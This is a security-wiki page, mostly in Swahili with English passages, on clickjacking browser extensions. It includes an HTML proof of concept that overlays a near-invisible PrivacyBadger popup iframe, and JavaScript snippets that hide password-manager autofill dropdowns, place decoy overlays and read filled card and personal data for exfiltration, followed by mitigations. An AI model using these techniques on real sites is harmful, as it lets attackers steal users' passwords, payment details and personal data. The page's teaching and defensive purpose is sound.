HackTricksBrowExt - ClickJacking
Reading time: 9 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Taarifa za Msingi
Kurasa hii itatumia udhaifu wa ClickJacking kwenye extension ya kivinjari.
Ikiwa haujui ClickJacking ni nini angalia:
Extensions contains the file manifest.json and that JSON file has a field web_accessible_resources. Here's what the Chrome docs say about it:
These resources would then be available in a webpage via the URL
chrome-extension://[PACKAGE ID]/[PATH], which can be generated with theextension.getURL method. Allowlisted resources are served with appropriate CORS headers, so they're available via mechanisms like XHR.1
The web_accessible_resources in a browser extension are not just accessible via the web; they also operate with the extension's inherent privileges. This means they have the capability to:
- Kubadilisha hali ya extension
- Kupakia rasilimali za ziada
- Kuingiliana na kivinjari kwa kiwango fulani
Hata hivyo, kipengele hiki kinaweka hatari ya usalama. Ikiwa rasilimali ndani ya web_accessible_resources ina kazi muhimu yoyote, mshambulizi anaweza kuingiza rasilimali hii kwenye ukurasa wa wavuti wa nje. Watumiaji wasiotarajia watakaotembelea ukurasa huu wanaweza kwa bahati mbaya kuamsha rasilimali iliyowekwa ndani. Kuamshwa hivyo kunaweza kusababisha matokeo yasiyotarajiwa, kulingana na ruhusa na uwezo wa rasilimali za extension.
Mfano - PrivacyBadger
Katika extension PrivacyBadger, udhaifu uligunduliwa unaohusiana na saraka skin/ kutangazwa kama web_accessible_resources kwa njia ifuatayo (Check the original blog post):
"web_accessible_resources": [
"skin/*",
"icons/*"
]
Konfigurasheni hii ilisababisha tatizo la usalama lenye uwezekano. Hasa, faili skin/popup.html, ambayo huonyeshwa wakati wa kuingiliana na ikoni ya PrivacyBadger kwenye kivinjari, inaweza kuingizwa ndani ya iframe. Uingizaji huo unaweza kutumiwa kudanganya watumiaji ili wabonye kwa bahati mbaya "Disable PrivacyBadger for this Website". Kitendo hicho kingeharibu faragha ya mtumiaji kwa kuzima ulinzi wa PrivacyBadger na kwa uwezekano kumuweka mtumiaji kwenye ufuatiliaji zaidi. Onyesho la kuona la exploit hii linaweza kutazamwa katika mfano wa video ya ClickJacking uliotolewa kwa https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm.
Ili kushughulikia udhaifu huu, suluhisho rahisi lilitekelezwa: kuondoa /skin/* kutoka kwenye orodha ya web_accessible_resources. Mabadiliko haya yalipunguza hatari kwa kuhakikisha kwamba yaliyomo katika saraka ya skin/ hayawezi kufikiwa au kuchezewa kupitia web-accessible resources.
Suluhisho lilikuwa rahisi: remove /skin/* from the web_accessible_resources.
PoC
<!--https://blog.lizzie.io/clickjacking-privacy-badger.html-->
<style>
iframe {
width: 430px;
height: 300px;
opacity: 0.01;
float: top;
position: absolute;
}
#stuff {
float: top;
position: absolute;
}
button {
float: top;
position: absolute;
top: 168px;
left: 100px;
}
</style>
<div id="stuff">
<h1>Click the button</h1>
<button id="button">click me</button>
</div>
<iframe
src="chrome-extension://ablpimhddhnaldgkfbpafchflffallca/skin/popup.html">
</iframe>
Mfano wa Metamask
A blog post about a ClickJacking in metamask can be found here. Katika kesi hii, Metamask ilirekebisha udhaifu kwa kuangalia kuwa itifaki inayotumika kuifikia ilikuwa https: au http: (si chrome: kwa mfano):
.png)
Another ClickJacking fixed in the Metamask extension was that users were able to Click to whitelist when a page was suspicious of being phishing because of “web_accessible_resources”: [“inpage.js”, “phishing.html”]. Kwa kuwa ukurasa huo ulikuwa dhaifu kwa ClickJacking, mshambuliaji angeweza kuutumia kwa kuonyesha kitu kinachoonekana kawaida ili kumfanya mwanaathirika kubofya Click to whitelist bila kutambua, kisha kurudi kwenye ukurasa wa phishing ambao utakuwa whitelisted.
Steam Inventory Helper Example
Angalia ukurasa ufuatao kuona jinsi XSS katika browser extension ilivyohusishwa na udhaifu wa ClickJacking:
DOM-based Extension Clickjacking (Password Manager Autofill UIs)
Classic extension clickjacking hutumika kwa kukosewa usanidi wa web_accessible_resources ku-iframe HTML yenye ruhusa na kuendesha click za mtumiaji. Aina mpya, DOM-based extension clickjacking, inalenga dropdowns za autofill zilizowekwa moja kwa moja kwenye DOM ya ukurasa na kutumia mbinu za CSS/DOM kuziweka siri au kuzificha wakati zinabaki zikiwa zinaweza kubofiwa. Bonyeza moja lililotumwa linaweza kuchagua kipengee kilichohifadhiwa na kujaza input zilizo chini ya udhibiti wa mshambuliaji na data nyeti.
Mfano wa tishio
- Mshambuliaji anasimamia webpage (au anapata XSS/subdomain takeover/cache poisoning kwenye domain inayohusiana).
- Mwanaathirika ana password manager extension imewekwa na imefunguliwa (baadhi ya autofill hufanya kazi hata wakati kwa kawaida imefungwa).
- Angalau bonyeza moja la mtumiaji linachochewa (banners za cookie zilizo overlay, dialog, CAPTCHA, michezo, nk).
Mtiririko wa shambulio (manual autofill)
- Ingiza fomu isiyonyesheshwa lakini inayoweza kupata focus (mashamba ya login/PII/credit-card).
- Fanya focus kwenye input ili kuleta dropdown ya extension’s autofill karibu na uwanja.
- Ficha au ziba UI ya extension wakati inabaki ikiwezekana kubofiwa.
- Panga udhibiti unaoonekana kuonekana chini ya dropdown iliyofichwa ili kuchochea bonyeza litakalochagua kipengee.
- Soma thamani zilizojazwa kutoka kwenye fomu ya mshambuliaji na uziexfiltrate.
Jinsi ya kuficha autofill UI
- Extension element
- Root element opacity (generic):
// Reduce or nullify opacity of the extension root
// Works when the root element is attached in the page DOM
const root = document.querySelector('protonpass-root')
if (root) root.style.opacity = 0
- Elementi mtoto ndani ya open ShadowRoot (tag ya dinamiki, ficha iframe ya ndani):
// Find dynamic root like <protonpass-root-xyz> and hide its child iframe
const root = Array.from(document.querySelectorAll('*'))
.find(el => el.tagName.toLowerCase().startsWith('protonpass-root-'))
if (root?.shadowRoot) {
const frame = root.shadowRoot.querySelector('iframe')
if (frame) frame.style.cssText += 'opacity:0 !important;'
}
- Elementi mzazi
- Mbinu za BODY/HTML za opacity kufanya extension UI isiyoonekana wakati ukurasa unaonekana kawaida (kwa mfano, screenshot background):
// Hide full page, then reveal a tiny amount to keep clicks working
document.body.style.opacity = 0
// Optional: Show a screenshot/lookalike to avoid a blank screen
// document.documentElement.style.backgroundImage = 'url(website.png)'
// Inject a credit-card form and focus to trigger dropdown
/* create #cardform with #cardnumber, #expiry, #cvc */
document.getElementById('cardnumber').focus()
// Make body barely visible to allow user interaction
document.body.style.opacity = '0.001'
function getCardValues() {
const num = document.getElementById('cardnumber').value
const exp = document.getElementById('expiry').value
const cvc = document.getElementById('cvc').value
// exfiltrate via XHR/fetch/websocket
}
- Overlay
- Overlay ya sehemu: funika kila kitu isipokuwa piksela chache ili dropdown ibaki ikibofolewa (hakikisha attacker overlay iko ya mwisho katika DOM na max z-index, au tumia Top Layer).
- Overlay kamili ikitumia pointer-events:none ili bonyezo lipitie hadi dropdown iliyofichwa; iiweke kudumu kwa Popover API:
<div id="overlay" popover style="pointer-events:none;">Cookie consent</div>
<script>
overlay.showPopover()
// Inject a personal data form and focus to trigger dropdown
/* create #personalform with #name/#email/#phone/... */
document.getElementById('name').focus()
function getData(){ /* read + exfil values on change */ }
</script>
Kupanga bonyezo la mwanaathirika
- Uwekaji wa kudumu: weka dropdown iliyofichwa chini ya udhibiti unaoweza kuaminiwa kama “Accept cookies”, “Close”, au kisanduku cha CAPTCHA.
- Fuata mouse: wahamisha sehemu ya kuingiza yenye umakini chini ya cursor ili dropdown iimfuate; rejesha umakini mara kwa mara ili bonyezo moja mahali popote lichague kipengee:
const f = document.getElementById('name')
document.addEventListener('mousemove', e => {
personalform.style = `top:${e.pageY-50}px;left:${e.pageX-100}px;position:absolute;`
// some managers hide the dropdown if focus is lost; refocus slowly
setTimeout(() => f.focus(), 100)
})
Impact and scenarios
- Tovuti inayodhibitiwa na mshambuliaji: bonyezo moja lililosukumwa linaweza kuhamisha nje data za kadi ya mkopo (nambari/muda wa kumalizika/CVC) na taarifa za kibinafsi (jina, barua pepe, simu, anwani, tarehe ya kuzaliwa (DOB)) ambazo hazijatengwa kwa kikoa.
- Tovuti ya kuaminika yenye XSS/subdomain takeover/cache poisoning: wizi wa nywila kwa bonyezo nyingi (jina la mtumiaji/nywila) na TOTP, kwa sababu mameneja wengi hujaza kiotomatiki kwenye subdomains au parent domains zinazohusiana (mf.,
*.example.com). - Passkeys: ikiwa RP haitoi uhusisho wa WebAuthn challenges na session, XSS inaweza kukamata uthibitisho uliosainiwa; DOM-based clickjacking inaficha ombi la passkey ili kupata bonyezo la kuthibitisha kutoka kwa mtumiaji.
Limitations
- Inahitaji angalau bonyezo moja la mtumiaji na muafaka mzuri wa piksela (overlays halisi huifanya iwe rahisi kusababisha bonyezo).
- Kufunga kwa kiotomatiki/kuingia nje hupunguza fursa za unyonyaji; baadhi ya mameneja bado hujaza kiotomatiki hata wakiwa “wamefungwa”.
Extension developer mitigations
- Render UI ya autofill katika Top Layer (Popover API) au vinginevyo hakikisha iko juu ya mpangilio wa tabaka za ukurasa; epuka kuzikwa na overlays zinazoendeshwa na ukurasa.
- Kuzuia uharibu wa CSS: pendelea Closed Shadow DOM na songa macho kwa kutumia
MutationObserverkwa mabadiliko ya mtindo yanayoshukiwa kwenye mizizi ya UI. - Gundua overlays zenye nia mbaya kabla ya kujaza: orodhesha elementi nyingine za top-layer/popover, zima kwa muda
pointer-events:none, na tumiaelementsFromPoint()kugundua occlusion; funga UI ikiwa overlays zipo. - Gundua mabadiliko hatari ya
<body>/<html>opacity au mtindo kabla na baada ya render. - Kwa masuala yanayotokana na iframe: weka mipaka kwa MV3
web_accessible_resourcesmatcheskwa uangalifu na epuka kufunua UI za HTML; kwa HTML zisizoepukika, tumaX-Frame-Options: DENYauContent-Security-Policy: frame-ancestors 'none'.
References
- https://blog.lizzie.io/clickjacking-privacy-badger.html
- https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9
- DOM-based Extension Clickjacking (marektoth.com)
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.